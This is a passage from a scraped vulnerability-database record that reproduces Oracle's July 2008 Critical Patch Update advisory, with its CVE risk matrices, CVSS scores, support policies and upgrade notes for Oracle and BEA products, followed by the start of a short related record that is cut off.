dictionary of CVE Identifiers for publicly known security vulnerabilities.\r\nWorkarounds\r\n\r\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. Until you apply the CPU fixes, it may be possible to reduce the risk of successful attack by restricting network protocols required by an attack. For attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from unprivileged users may help reduce the risk of successful attack. Both approaches may break application functionality, so Oracle strongly recommends that customers test changes on non-production systems. Neither approach should be considered a long-term solution as neither corrects the underlying problem.\r\nUnsupported Products and De-Supported Versions\r\n\r\nUnsupported products, releases and versions are not tested for the presence of vulnerabilities addressed by this Critical Patch Update. However, it is likely that earlier patch sets of affected releases are also affected by these vulnerabilities.\r\n\r\nCritical Patch Update patches are not provided for product versions that are no longer covered under the Premier Support or Extended Support phases of the Lifetime Support Policy. We recommend that customers upgrade to the latest supported version of Oracle products in order to obtain patches.\r\n\r\nExtended Support Phase: Critical Patch Update patches are available to customers who have purchased Extended Support under the Lifetime Support Policy. Customers must have a valid Extended Support service contract to be able to download Critical Patch Update patches for products in the Extended Support Phase. Critical Patch Update patches may not be downloaded to update products supported with Sustaining Support, or to update any unsupported products.\r\n\r\nSupported Database, Fusion Middleware and Collaboration Suite products are patched in accordance with the Software Error Correction Support Policy explained in MetaLink Note 209768.1. Please review the Technical Support Policies for further guidelines regarding support policies and phases of support.\r\nOn Request Model for Oracle Database and Oracle Application Server\r\n\r\nOracle will proactively create patches only for platform/version combinations that, based on historical data, customers are likely to download for the next Critical Patch Update. We create patches for historically inactive platform/version combinations of the Oracle Database and Oracle Application Server only if requested by customers. Fixes for the vulnerabilities will continue to be included in future releases and patch sets.\r\n\r\nAdditional details regarding the products, versions and platforms that will be supported for the next Critical Patch Update and the process for requesting On Request patches are available in Section 4.10 (Planned Patches for Next CPU release) of the Critical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products (MetaLink Note 579278.1).\r\nCredit Statement\r\nThe following people or organizations discovered and brought security vulnerabilities addressed by this Critical Patch Update to Oracle's attention: Flavio Casetta of Yocoya; Esteban Martinez Fayo of Application Security, Inc.; Johannes Greil of SEC Consult; guyp of Sentrigo; Joxean Koret; Alexander Kornbrust of Red Database Security; Stephen Kost of Integrigy; Dave Lewis; David Litchfield of NGS Software; Hirofumi Oka of JPCERT/CC Vulnerability Handling Team; Tanel Poder; Alexandr Polyakov of Digital Security; Andrea Purificato; and Dave Wichers of Aspect Security.\r\n\r\nSecurity-In-Depth Contributors\r\n\r\nOracle has instituted a new program to give recognition to people that have contributed to our Security-In-Depth program (see FAQ). People are recognized for Security-In-Depth contributions if they provide information, observations or suggestions pertaining to security vulnerability issues that result in significant modification of Oracle code or documentation in future releases, but are not of such a critical nature that they are distributed in Critical Patch Updates.\r\n\r\nFor this Critical Patch Update, Oracle recognizes Alexander Kornbrust of Red Database Security for contributions to Oracle's Security-In-Depth program.\r\nJanuary 2008 Credit\r\nOracle recognizes Laszlo Toth for reporting a vulnerability that was fixed in the January 2008 Critical Patch Update (Oracle inadvertently neglected to credit Laszlo in the January Critical Patch Update Advisory).\r\nCritical Patch Update Schedule\r\n\r\nCritical Patch Updates are released on the Tuesday closest to the 15th day of January, July, April and October. The next four dates are:\r\n\r\n * 14 October 2008\r\n * 13 January 2009\r\n * 14 April 2009\r\n * 14 July 2009\r\n\r\nReferences\r\n\r\n * Oracle Critical Patch Updates and Security Alerts main page [ Oracle Technology Network ]\r\n * Oracle PeopleSoft Security main page [ Customer Connection ]\r\n * Critical Patch Update - July 2008 Documentation Map [ MetaLink Note 605152.1 ]\r\n * Oracle Critical Patch Updates and Security Alerts - Frequently Asked Questions [ CPU FAQ ] \r\n * Risk Matrix definitions [ Risk Matrix Definitions ]\r\n * Use of Common Vulnerability Scoring System (CVSS) by Oracle [ Oracle CVSS Scoring ]\r\n * List of public vulnerabilities fixed in Critical Patch Updates and Security Alerts [ Oracle Technology Network ]\r\n * Software Error Correction Support Policy [MetaLink Note 209768.1 ]\r\n * Security Advisories Notifications for BEA products [BEA Security Advisories ]\r\n\r\nModification History\r\n\r\n2008-JUL-15 \tInitial release\r\n\r\n\r\n\r\nAppendix A - Oracle Database\r\n\r\nOracle Database Executive Summary\r\n\r\nThis Critical Patch Update contains a total of 14 new security fixes for Oracle Database products, divided as follows:\r\n\r\n * 11 new security fixes for the Oracle Database. None of these database vulnerabilities may be remotely exploitable without authentication, i.e. none may be exploited over a network without the need for a username and password. No new security fixes are applicable to Oracle Database client-only installations, i.e. installations that do not have the Oracle Database installed.\r\n * 3 new security fixes for the Times Ten In-Memory Database. All of these vulnerabilities may be remotely exploitable without authentication, i.e. they may be exploited over a network without the need for a username and password.\r\n * No new security fixes for the following products:\r\n o Oracle Secure Enterprise Search, which is a separate product that is not installed with the Oracle Database.\r\n o Oracle Application Express (formerly called HTML DB).\r\n o Oracle Audit Vault, which is a separate product that is not installed with the Oracle Database.\r\n o Oracle HTTP Server, which is installed by default with Oracle Database 9i Release 2. For Oracle Database versions 10g and higher, Oracle HTTP Server is on the Companion CD, is separately installable, and is not installed with the Database. Oracle recommends that customers apply this Critical Patch Update to Oracle HTTP Server installations that are affected by vulnerabilities fixed in prior Critical Patch Updates if the prior patches have not been applied. If Oracle HTTP Server has not been installed, this software will not be present and the Oracle HTTP Server patches are not required.\r\n\r\n\r\n\r\nOracle Database Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2607 \tAdvanced Queuing \tOracle Net \tExecute on SYS.DBMS_AQELM \tNo \t6.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tPartial+ \t9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.6 \t \r\nCVE-2008-2613 \tDatabase Scheduler \tLocal \toinstall - OS group \tNo \t6.0 \tLocal \tHigh \tSingle \tComplete \tComplete \tComplete \t10.2.0.4, 11.1.0.6 \t \r\nCVE-2008-2592 \tAdvanced Replication \tOracle Net \tExecute on SYS.DBMS_DEFER_SYS \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t9.0.1.5+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.6 \tSee Note 1\r\nCVE-2008-2604 \tAuthentication \tOracle Net \tNone \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial \tPartial \tNone \t11.1.0.6 \t \r\nCVE-2008-2591 \tOracle Database Vault \tOracle Net \tCreate Public Synonym \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial \tPartial \tNone \t9.2.0.8DV, 10.2.0.3, 11.1.0.6 \t \r\nCVE-2008-2600 \tOracle Spatial \tOracle Net \tExecute on MDSYS.SDO_TOPO_MAP \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t10.1.0.5, 10.2.0.3, 11.1.0.6 \t \r\nCVE-2008-2602 \tData Pump \tOracle Net \tCreate Session, IMP_FULL_DATABASE role \tNo \t4.6 \tNetwork \tHigh \tSingle \tPartial+ \tPartial+ \tPartial+ \t10.1.0.5, 10.2.0.4, 11.1.0.6 \t \r\nCVE-2008-2605 \tAuthentication \tOracle Net \tNone \tNo \t4.0 \tNetwork \tLow \tSingle \tPartial+ \tNone \tNone \t11.1.0.6 \t \r\nCVE-2008-2611 \tCore RDBMS \tOracle Net \tCreate Table \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tNone \tPartial+ \t9.0.1.5+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.4, 11.1.0.6 \tSee Note 1\r\nCVE-2008-2608 \tData Pump \tOracle Net \tExecute on SYS.KUPF$FILE_INT \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tNone \tPartial \t10.1.0.5, 10.2.0.3 \t \r\nCVE-2008-2590 (Enterprise Manager) \tInstance Management \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.0.5 \t \r\nCVE-2008-2603 (Enterprise Manager) \tResource Manager \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.0.5, 10.2.0.4, 11.1.0.6 \t \r\nCVE-2008-2587 \tAdvanced Replication \tLocal \tread access to trace files \tNo \t1.5 \tLocal \tMedium \tSingle \tPartial+ \tNone \tNone \t9.0.1.5+, 9.2.0.8, 9.2.0.8DV, 10.1.0.5, 10.2.0.3 \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. 9.0.1.5+ refers to Oracle Database 9i, version 9.0.1.5 FIPS+, which is only used in conjunction with Oracle Application Server 10g (9.0.4), version 9.0.4.3.\r\n\r\n\r\n\r\nOracle Database Client-only Installations\r\n\r\nNo new vulnerabilities affect Oracle Database client-only installations (installations that do not have the Oracle Database installed).\r\n\r\nOracle Secure Enterprise Search\r\n\r\nOracle Secure Enterprise Search 10g is a standalone product that enables searching across a corporation's enterprise information assets. Unless you installed the Oracle Secure Enterprise Search product, it will not be present on your system and no further action is required.\r\n\r\nThe security vulnerabilities listed in the previous Critical Patch Advisories are fixed in Oracle Secure Enterprise Search 10g, version 10.1.8.3. Customers on previous versions of Secure Enterprise Search should upgrade to version 10.1.8.3 or later. Instructions on upgrading Oracle Secure Enterprise Search can be found in the Online Documentation. This, and the software to install, is referenced from the Oracle Technology Network Secure Enterprise Search page.\r\n\r\nOracle Secure Enterprise Search 10g includes Oracle Database 10g version 10.1.0.5, and since vulnerabilities affecting this Database version may affect Oracle Secure Enterprise Search, Oracle recommends that customers apply the July 2008 Critical Patch Update to the embedded Database.\r\n\r\nOracle Audit Vault\r\n\r\nOracle Audit Vault 10g is a standalone product that collects and analyzes audit data from multiple systems. Unless you installed the Oracle Audit Vault product, it will not be present on your system and no further action is required.\r\n\r\nOracle Audit Vault has no security vulnerabilities listed in this Critical Patch Update advisories. It is recommended that customers on previous versions of Audit Vault upgrade to version 10.2.3.0 or later. Information about Oracle Audit Vault can be found in the Online Documentation. This, and the Audit Vault software to install, is referenced from the Oracle Technology Network Audit Vault page.\r\n\r\nOracle Audit Vault 10g includes Oracle Database 10g version 10.2.0.3, and vulnerabilities affecting this Database version may affect Oracle Audit Vault. Oracle recommends that all Oracle Audit Vault customers review the Critical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products, MetaLink Note 579278.1 before applying the July 2008 Critical Patch Update to the embedded Database.\r\n\r\nOverview of Oracle Application Express\r\n\r\nOracle Application Express is a rapid web application development tool for the Oracle Database. Unless you separately installed Oracle Application Express from a Companion CD supplied with the Oracle Database CD set or from a package downloaded from an Oracle web site, it will not be present on your system and no further action is required.\r\n\r\nTo check for the presence of Application Express on a system, run the following command from a SQL prompt as SYS:\r\nselect username from dba_users where username in ('FLOWS_010500','FLOWS_010600','FLOWS_020000','FLOWS_020200','FLOWS_030000', 'FLOWS_030100');\r\n\r\nIf the result is 'no rows selected' then no version of the product is installed and no further action is required. Other output indicates Oracle Application Express is installed, even if it is not actively in use.\r\n\r\nUpgrading Oracle Application Express\r\n\r\nThere are no Oracle Application Express security vulnerabilities listed in the risk matrix above. Previously announced security vulnerabilities in Oracle Application Express are fixed in version 3.1 or later. Instructions on upgrading and the software to install the latest version of Oracle Application Express can be found on:\r\nhttp://www.oracle.com/technology/products/database/application_express/download.html.\r\n\r\n\r\n\r\nTimes Ten In-Memory Database Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2597 \tTimesTen Client/Server \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t7.0.3.0.0 \tSee Note 1\r\nCVE-2008-2598 \tTimesTen Client/Server \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t7.0.3.0.0 \tSee Note 1\r\nCVE-2008-2599 \tTimesTen Client/Server \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t7.0.3.0.0 \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. The fix is included in version 7.0.4.0.0 of Times Ten Server. Customers on previous versions of Times Ten Server should upgrade to version 7.0.4.0.0 or later.\r\n\r\n\r\nOverview of Times Ten In-Memory Database\r\n\r\nTimes Ten In-memory Database is a memory resident relational Database that targets real-time applications requiring instant response times. It is deployed in the application tier as an embedded database. If you have not installed Times Ten In-memory Database, then no further action is required.\r\n\r\nUpgrading Times Ten In-Memory Database\r\n\r\nThe Times Ten In-Memory Database security vulnerabilities are fixed in version 7.0.4.0.0. All previous versions should be upgraded to version 7.0.4.0.0 or later. Instructions on upgrading and the software to install the latest version of Times Ten In-Memory Database can be found on:\r\nhttp://download.oracle.com/otn_hosted_doc/timesten/703/TimesTen-Documentation/install.pdf.\r\n\r\n\r\n\r\nAppendix B - Oracle Application Server\r\n\r\nOracle Application Server Executive Summary\r\n\r\nThis Critical Patch Update contains 9 new security fixes for Oracle Application Server Suite. All of these vulnerabilities may be remotely exploitable without authentication, i.e. they may be exploited over a network without the need for a username and password. None of these security fixes is applicable to client-only installations, i.e. installations that do not have Oracle Application Server installed.\r\n\r\nOracle Application Server products that are bundled with the Oracle Database are affected by the vulnerabilities listed in the Oracle Database section. They are not discussed further in this section and are not listed in the Oracle Application Server risk matrix.\r\n\r\n\r\nOracle Application Server Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2007-1359 \tOracle HTTP Server \tHTTP \tNone \tYes \t6.8 \tNetwork \tMedium \tNone \tPartial \tPartial \tPartial \t10.1.2.3, 10.1.3.3 \t \r\nCVE-2008-2589 \tOracle Portal \tHTTP \tNone \tYes \t6.4 \tNetwork \tLow \tNone \tPartial+ \tPartial+ \tNone \t9.0.4.3, 10.1.2.2, 10.1.4.1 \t \r\nCVE-2008-2594 \tOracle Portal \tHTTP \tNone \tYes \t6.4 \tNetwork \tLow \tNone \tPartial+ \tPartial+ \tNone \t10.1.2.3, 10.1.4.2 \t \r\nCVE-2008-2609 \tOracle Portal \tHTTP \tNone \tYes \t6.4 \tNetwork \tLow \tNone \tPartial+ \tPartial+ \tNone \t9.0.4.3, 10.1.2.3, 10.1.4.2 \t \r\nCVE-2008-2595 \tOracle Internet Directory \tLDAP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t9.0.4.3, 10.1.2.3, 10.1.4.2 \t \r\nCVE-2008-2612 \tHyperion BI Plus \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t8.3.2.4, 8.5.0.3, 9.2.0.3, 9.2.1.0, 9.3.1.0 \tSee Note 1\r\nCVE-2008-2614 \tOracle HTTP Server \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t9.0.4.3, 10.1.2.3, 10.1.3.3 \t \r\nCVE-2008-2583 \tOracle Portal \tHTTP \tOracleAS Discussion Forum Portlet \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \tNone - See Note Below \tSee Note 2\r\nCVE-2008-2593 \tOracle Portal \tHTTP \tNone \tYes \t4.3 \tNetwork \tMedium \tNone \tNone \tPartial \tNone \t10.1.2.3, 10.1.4.2 \t \r\n \r\n\r\nNotes:\r\n\r\n 1. This vulnerability also affects earlier versions of this product, namely Hyperion Performance Suite (versions 8.3.2.4 and 8.5.0.3). Note that separate patches are available for each of these product versions.\r\n 2. Discussion Forum Portlet is a sample Portlet which was available for download from OTN and has this vulnerability. Discussion Forum Portlet is no longer available for download and customers who have not downloaded it do not have this vulnerability. Customers who have downloaded Discussion Forum Portlet in the past should manually delete it in order to eliminate this vulnerability.\r\n\r\n\r\nOracle Application Server Client-only Installations\r\n\r\nNone of the above vulnerabilities affects Oracle Application Server client-only installations.\r\n\r\n\r\n\r\nAppendix C - Oracle Collaboration Suite\r\n\r\nOracle Collaboration Suite Executive Summary\r\n\r\nThere are no new Oracle Collaboration Suite specific fixes in this Critical Patch Update.\r\n\r\nThis Critical Patch Update contains no new fixes to Oracle Application Server vulnerabilities that are in code included in Oracle Collaboration Suite. Oracle Collaboration Suite bundles the Oracle Database. All the security fixes listed in the Oracle Database part of the Oracle Database section are applicable. The Oracle Collaboration Suite documentation referenced from this advisory lists the patches that should be installed on Oracle Collaboration Suite instances to fix these Oracle Database issues.\r\n\r\n\r\n\r\nAppendix D - Oracle E-Business Suite and Applications\r\n\r\nOracle E-Business Suite and Applications Executive Summary\r\n\r\nThis Critical Patch Update contains 6 new security fixes for the Applications Suite. None of these vulnerabilities may be remotely exploitable without authentication, i.e. none may be exploited over a network without the need for a username and password. None of these fixes are applicable to Oracle E-Business Suite client-only installations.\r\n\r\nOracle E-Business Suite 11i includes Oracle9i Application Server, version 1.0.2.2 code, including Oracle Reports Developer. None of the Oracle Application Server vulnerabilities fixed in this Critical Patch Update affect this version.\r\n\r\nOracle E-Business Suite products include an Oracle Database which is affected by the vulnerabilities listed in the Oracle Database section. The exposure of Oracle E-Business Suite products is dependent on the Oracle Database version being used. Oracle Database vulnerabilities are not listed in the Oracle E-Business Suite risk matrix, but since vulnerabilities affecting this Database version may affect Oracle E-Business Suite products, Oracle recommends that customers apply the July 2008 Critical Patch Update to the embedded Database.\r\n\r\nThere are no new security fixes specific to Oracle Life Sciences Applications (previously known as Oracle Pharmaceutical Applications). However, Oracle Life Sciences Applications includes Oracle Application Server components and Oracle Database software. The exposure of Oracle Life Sciences Applications depends on the versions of Oracle Application Server and the Oracle Database being used. Oracle recommends that customers apply the July 2008 Critical Patch Update to the Oracle Database and Oracle Application Server that are included in Oracle Life Sciences Applications. Please refer to the Oracle Application Server and Oracle Database sections for more information. Oracle Life Sciences Applications customers should refer to MetaLink Note 605119.1 for detailed information on applying the Critical Patch Update to the Oracle Database and Application Server components.\r\n\r\n\r\nOracle E-Business Suite Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2596 \tMobile Application Server \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial \tNone \t12.0.3 \t \r\nCVE-2008-2585 \tOracle Report Manager \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tNone \tPartial \tPartial \t12.0.4 \t \r\nCVE-2008-2601 \tOracle iStore \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial \tPartial \tNone \t12.0.4 \t \r\nCVE-2008-2586 \tOracle Application Object Library \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tPartial \tNone \tNone \t12.0.4 \t \r\nCVE-2008-2606 \tOracle Application Object Library \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t12.0.4 \t \r\nCVE-2008-2610 \tOracle Applications Technology Stack \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t12.0.4 \t \r\n \r\n\r\n\r\n\r\n\r\n\r\nAppendix E - Oracle Enterprise Manager\r\n\r\nOracle Enterprise Manager Executive Summary\r\n\r\nThis Critical Patch Update contains 2 new security fixes for the Enterprise Manager Suite. Neither of these vulnerabilities may be remotely exploitable without authentication, i.e. neither may be exploited over a network without the need for a username and password. \r\n\r\nOracle Enterprise Manager 10g Grid Control includes Oracle Database and Oracle Application Server components that are affected by the vulnerabilities listed in the Oracle Database and Oracle Application Server sections. The exposure of a particular instance of Oracle Enterprise Manager depends on the Oracle Database and Oracle Application Server versions being used. Oracle recommends that customers apply the July 2008 Critical Patch Update to the embedded Oracle Database and Oracle Application Server.\r\n\r\nReleases of Oracle Enterprise Manager before Oracle Enterprise Manager 10g Grid Control include Oracle Database components that are affected by the vulnerabilities listed in the Oracle Database section. The exposure of a particular instance of Oracle Enterprise Manager depends on the Oracle Database version being used. Oracle recommends that customers apply the July 2008 Critical Patch Update to the embedded Oracle Database.\r\n\r\nOracle Enterprise Manager Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2590 \tInstance Management \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \t10.1.0.6 \t \r\nCVE-2008-2603 \tResource Manager \tHTTP \tValid Session \tNo \t3.5 \tNetwork \tMedium \tSingle \tNone \tPartial \tNone \tNone - See Note Below \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. This vulnerability affects Database Control only. No Grid Control patch is required.\r\n\r\n\r\n\r\n\r\n\r\nAppendix F - Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne\r\n\r\nOracle PeopleSoft Enterprise and JD Edwards EnterpriseOne Executive Summary\r\n\r\nThis Critical Patch Update contains 7 new security fixes for the PeopleSoft-JDEdwards Suite. None of these vulnerabilities may be remotely exploited without authentication, i.e. they may not be exploited over a network without the need for a username and password. None of these fixes are applicable to client-only installations, i.e. installations that do not have a server installed.\r\n\r\n\r\nOracle PeopleSoft Enterprise and JD Edwards EnterpriseOne Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2615 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t8.48.17, 8.49.11 \t \r\nCVE-2008-2622 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t5.5 \tNetwork \tLow \tSingle \tPartial+ \tPartial+ \tNone \t8.48.17, 8.49.11 \t \r\nCVE-2008-2616 \tPeopleSoft PeopleTools \tNetwork \tValid Session \tNo \t4.9 \tNetwork \tMedium \tSingle \tNone \tPartial \tPartial \t8.48.17, 8.49.11 \t \r\nCVE-2008-2617 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t4.9 \tNetwork \tMedium \tSingle \tPartial \tNone \tPartial \t8.48.17, 8.49.11 \t \r\nCVE-2008-2618 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t4.9 \tNetwork \tMedium \tSingle \tPartial+ \tPartial+ \tNone \t8.48.17, 8.49.11 \t \r\nCVE-2008-2620 \tPeopleSoft PeopleTools \tNetwork \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t8.48.17, 8.49.11 \t \r\nCVE-2008-2621 \tPeopleSoft PeopleTools \tHTTP \tValid Session \tNo \t4.0 \tNetwork \tLow \tSingle \tNone \tPartial \tNone \t8.48.17, 8.49.11 \t \r\n \r\n\r\n\r\n\r\n\r\nAppendix G - Oracle Siebel Enterprise\r\n\r\nOracle Siebel Enterprise Executive Summary\r\n\r\nThis Critical Patch Update contains no new security fixes for the Siebel Suite. \r\n\r\nAppendix H - BEA Product Suite\r\n\r\nBEA Products Executive Summary\r\n\r\nThis Critical Patch Update contains 7 new security fixes for the BEA Product Suite. 4 of these vulnerabilities may be remotely exploitable without authentication, i.e. may be exploited over a network without the need for a username and password. \r\n\r\n\r\n\r\nBEA Product Suite Risk Matrix\r\nVuln# \tComponent \tProtocol \tPackage and/or Privilege Required \tRemote Exploit without Auth.? \tCVSS VERSION 2.0 RISK (see Risk Matrix Definitions) \tLast Affected Patch set (per Supported Release) \tNotes\r\nBase Score \tAccess Vector \tAccess Complexity \tAuthentication \tConfidentiality \tIntegrity \tAvailability\r\nCVE-2008-2579 \tWebLogic Server Plugins for Apache, Sun and IIS web servers \tHTTP \tApache, Sun or IIS \tYes \t6.8 \tNetwork \tMedium \tNone \tPartial \tPartial \tPartial \t10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, 6.1 SP7 \tSee Note 1\r\nCVE-2008-2581 \tWebLogic Server \tHTTP \tUDDI Explorer \tYes \t5.1 \tNetwork \tHigh \tNone \tPartial+ \tPartial+ \tPartial+ \t10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7 \tSee Note 1\r\nCVE-2008-2582 \tWebLogic Server \tHTTP \tNone \tYes \t5.0 \tNetwork \tLow \tNone \tNone \tNone \tPartial+ \t10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7 \tSee Note 1\r\nCVE-2008-2577 \tWebLogic Server \tHTTP \tConsole or WLST user \tNo \t4.6 \tNetwork \tHigh \tSingle \tPartial \tPartial \tPartial \t9.2 MP1 \tSee Note 1\r\nCVE-2008-2578 \tWebLogic Server \tLocal \tNone \tNo \t4.3 \tLocal \tLow \tSingle \tPartial+ \tPartial+ \tPartial+ \t10.0, 9.2 MP1 \tSee Note 1\r\nCVE-2008-2576 \tWebLogic Server \tLocal \tNone \tNo \t4.1 \tLocal \tMedium \tSingle \tPartial \tPartial \tPartial \t9.2, 9.1, 9.0, 8.1 SP6 \tSee Note 1\r\nCVE-2008-2580 \tWebLogic Server \tHTTP \tNone \tYes \t2.6 \tNetwork \tHigh \tNone \tPartial \tNone \tNone \t10.0 MP1, 9.2 MP3, 9.1, 9.0 \tSee Note 1\r\n \r\n\r\nNotes:\r\n\r\n 1. Follow the link for each of the CVE numbers to get download, installation and other information pertaining to the corresponding vulnerability fix: CVE-2008-2576, CVE-2008-2577, CVE-2008-2578, CVE-2008-2579, CVE-2008-2580, CVE-2008-2581, CVE-2008-2582\r\n", "edition": 1, "cvss3": {}, "published": "2008-07-18T00:00:00", "title": "Oracle Critical Patch Update Advisory - July 2008", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-2606", "CVE-2008-2579", "CVE-2008-2591", "CVE-2008-2600", "CVE-2008-2612", "CVE-2008-2605", "CVE-2007-1359", "CVE-2008-2603", "CVE-2008-2620", "CVE-2008-2587", "CVE-2008-2583", "CVE-2008-2577", "CVE-2008-2581", "CVE-2008-2582", "CVE-2008-2597", "CVE-2008-2604", "CVE-2008-2589", "CVE-2008-2602", "CVE-2008-2598", "CVE-2008-2576", "CVE-2008-2607", "CVE-2008-2601", "CVE-2008-2617", "CVE-2008-2614", "CVE-2008-2595", "CVE-2008-2578", "CVE-2008-2616", "CVE-2008-2594", "CVE-2008-2608", "CVE-2008-2611", "CVE-2008-2580", "CVE-2008-2590", "CVE-2008-2586", "CVE-2008-2610", "CVE-2008-2613", "CVE-2008-2621", "CVE-2008-2609", "CVE-2008-2622", "CVE-2008-2592", "CVE-2008-2599", "CVE-2008-2593", "CVE-2008-2618", "CVE-2008-2585", "CVE-2008-2596", "CVE-2008-2615"], "modified": "2008-07-18T00:00:00", "id": "SECURITYVULNS:DOC:20166", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20166", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T19:09:20", "description": "New Critical Patch Update patches nearly 50 different vulnerabilities in all Oracle products.", "edition": 2, "cvss3": {}, "published": "2008-08-05T00:00:00", "title": "Oracle multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-2606", "CVE-2008-2579", "CVE-2008-2591", "CVE-2008-2600", "CVE-2008-2612", "CVE-2008-2605", "CVE-2007-1359", "CVE-2008-2603", "CVE-2008-2620", "CVE-2008-2587", "CVE-2008-2583", "CVE-2008-2577", "CVE-2008-2581", "CVE-2008-2582", "CVE-2008-2597", "CVE-2008-2604", "CVE-2008-2589", "CVE-2008-2602", "CVE-2008-2598", "CVE-2008-2576", "CVE-2008-2607", "CVE-2008-2601", "CVE-2008-2617", "CVE-2008-2614", "CVE-2008-2595", "CVE-2008-2578", "CVE-2008-2616", "CVE-2008-2594", "CVE-2008-2608", "CVE-2008-2611", "CVE-2008-2580", "CVE-2008-2590", "CVE-2008-2586", "CVE-2008-2610", "CVE-2008-2613", "CVE-2008-2621", "CVE-2008-2609", "CVE-2008-2622", "CVE-2008-2592", "CVE-2008-2599", "CVE-2008-2593", "CVE-2008-2618", "CVE-2008-2585", "CVE-2008-2596", "CVE-2008-2615"], "modified": "2008-08-05T00:00:00", "id": "SECURITYVULNS:VULN:9153", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9153", "cvss": {"score": 7.5, "vector": 